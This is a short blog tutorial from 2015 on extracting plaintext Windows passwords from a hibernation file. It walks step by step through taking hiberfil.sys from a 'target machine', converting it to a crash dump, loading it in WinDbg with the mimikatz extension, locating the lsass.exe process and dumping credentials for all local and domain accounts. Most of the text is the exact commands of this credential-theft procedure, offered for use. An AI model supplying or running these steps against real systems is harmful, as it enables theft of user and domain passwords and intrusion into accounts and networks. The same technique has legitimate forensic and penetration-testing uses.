Posted on April 22, 2015 · Posted in Security

How to Extract Windows User Passwords from Hiberfil.sys

Mimikatz, a tool that allows to extract Windows credentials  as plain text from LSA, is available since 2012. However, besides a well-covered feature of recovering passwords from the memory of a running OS, it has another interesting capability. Further a step-by-step instructions are given, how to easily extract the Windows users credentials data from hiberfil.sys file.


To follow these instructions we’ll need the following tools:

  1. Debugging Tools for Windows (WinDbg)
  2. Windows Memory toolkit free edition
  3. And mimikatz itself


  1. Get hiberfil.sys from the target machine.
  2. Convert it into a format WinDbg can work with: hibr2dmp.exe
    d:\temp\hiberfil.sys c:\temp\hiberfil.dmp

    It can take some time (in our example, it took about 14 hours).
    hibr2dmp.exe - Convert hiberfile.sys to dmp format

  3. Run WinDbg and open the file you got in the previous step.File -> Open Crash Dump
  4. Set the debug symbols.Open File -> Symbol File Path… and enter the next line:SRV*c:\symbols*

    WinDbg: set Symbol Search Path

    You can specify any other directory to which the symbols are to be downloaded instead of c:\symbols

    Type the following in the debugger command prompt:

    0: kd> .reload /n

    Wait till the symbol download is completed:

    Debugging Tools for Windows : load-kernel symbols

  5. Specify the path to mimilib.dll. (It is located in the same directory as mimikatz.)
    0: kd> .load z:\Sft\Security\Password\Mimikatz\x64\mimilib.dll

    WinDbg: load mimikatz dll (mimilib.dll)

  6. Find the address of lsass.exe.
    0: kd> !process 0 0 lsass.exee

    WinDbg: find lsass.exe process

    In our case the address is as follows: fffffa800a7d9060.

  7. Switch the process context.
    0: kd> .process /r /p fffffa800a7d9060

    Switch to process context in WinDbg

  8. Run mimikatz and obtain plaint text passwords.
    0:kd> !mimikatz

    Get plaintext Windows users passwords from hiberfile.sys

This way you can extract from the hibernation file passwords of all local and domain accounts, registered in the system.

Related Articles